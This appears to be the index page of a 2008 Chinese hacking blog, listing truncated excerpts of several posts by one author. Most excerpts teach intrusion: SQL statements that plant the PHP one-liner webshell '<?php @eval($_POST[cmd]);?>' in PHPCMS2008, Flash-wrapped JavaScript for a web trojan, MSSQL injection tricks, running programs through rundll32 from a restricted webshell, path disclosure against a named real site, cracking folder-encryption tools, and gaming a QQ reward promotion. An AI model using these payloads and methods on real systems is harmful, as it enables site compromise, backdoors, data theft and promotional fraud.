Nov292008

    利用Moto的漏洞刷QQ绿钻

    利用Moto的漏洞刷QQ绿钻
    利用Moto的漏洞刷QQ绿钻,希望大家保密,不要外传。 活动有效时间:截止到2008年12月31日 奖品:刷qq绿钻 活动介绍: 今天告诉大家一个刷qq绿钻的方法,我们要用的活动是,MOTO音乐雷达,送手机,送免费qq绿钻, 每天积分的前30名可以获得qq绿钻。我们可以通过刷积分的方式来获得qq绿钻。 获得积分的方法主要有两种: 1、自己答题,普通qq用户最高每天拿100分。qq绿钻用户最高200分 告诉大...阅读全文
    作者:天晴 | 分类:Resources | 阅读: | 标签:, ,
    抢沙发
    Nov272008

    HOW TO GET PHPCMS2008 WEBSHELL

    HOW TO GET PHPCMS2008 WEBSHELL
    http://www.pcsec.org/archives/how-to-get-phpcms2008-webshell.html Posted by 小拳头 进去后 SQL代码 Create TABLE b (cmd text NOT NULL); SQL代码 Insert INTO b (cmd) VALUES(‘<?php @eval($_POST[cmd]);?>’); //在字段cmd中插入一句话木马,木马内容为 PHP代码 <?php @eval($_POST[cmd]);?> 前3句都尅执行成功最...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:
    抢沙发
    Nov272008

    利用Flash封装网马

    利用Flash封装网马
    使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码: import flash.external.*; ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = [&#...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:,
    抢沙发
    Nov252008

    28度的冰注入技巧之(一)——404页面妙用

    28度的冰注入技巧之(一)——404页面妙用
    文章来源于 28度的冰 d72e27e1 遇到一个sa注入点,mssql错误提示关闭无疑是让人郁闷的事情。 虽然错误提示关闭也是可以列目录,执行命令,但是多少就有些不方便。阿D就可以在错误提示关闭的情况下列目录。 这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。 IIS,404页面的默认路径是 C:WindowsHelpiisHelpcommon404b.htm 得到we...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:,
    抢沙发
    Nov252008

    利用rundll32执行exe文件

    利用rundll32执行exe文件
    一个webshell,系统权限设置得很好,常用的exe都无权执行。可写目录传上去的exe文件,也没有执行权限。 最终发现设置权限的时候漏掉了rundll32.exe,如是就写了这个个代码。 测试开始的时候,PHP似乎没权执行命令。本来打算用php本身的一些溢出问题,溢出一个低权限的shell来的。后来意外发现使用proc_open函数可以执行一些内部命令,只是外部命令和目录都做了比较严格的权限设置而已。于...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, ,
    抢沙发
    Nov252008

    站长网dedecms爆目录方法

    站长网dedecms爆目录方法
    站长网 dedecms爆目录方法 http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig Fatal error: Unsupported operand types in E:2008.chinazincludehtmleditindex.php on line 7 这些都是利用cms漏洞 然后说下Phpmyadmin 这个比较多 基本上用phpmyadmin的站90%都可以爆目录 上次记得搞百度的时候 就发现个...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:, ,
    抢沙发
    Nov252008

    一些“加密”软件的破解方法

    一些“加密”软件的破解方法
    现在网络上流行很多文件夹加密和文件加密的所谓加密软件,很多都是个人根据开源代码编写的程序,多数都是利用windows技巧实现的(最常见的就是将文件隐藏到回收站,万一你不小心删除了回收站或者重装了系统,那就只有哭了),最受不了的就是他们还都号称自己是什么“无敌”加密,下面就告诉大家几款加密软件的破解方法,非常简单,你可以用这个办法,去破解使用这类软件的电脑,...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:,
    抢沙发
    Nov212008

    GET PHPCMS2008 WEBSHELL

    GET PHPCMS2008 WEBSHELL
    进去后 Create TABLE b (cmd text NOT NULL);            Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');    //在字段cmd中插入一句话木马,木马内容为<?php @eval($_POST[cmd]);?> 前3句都尅执行成功最后一句执行...阅读全文
    作者:天晴 | 分类:Articles | 阅读: | 标签:,
    抢沙发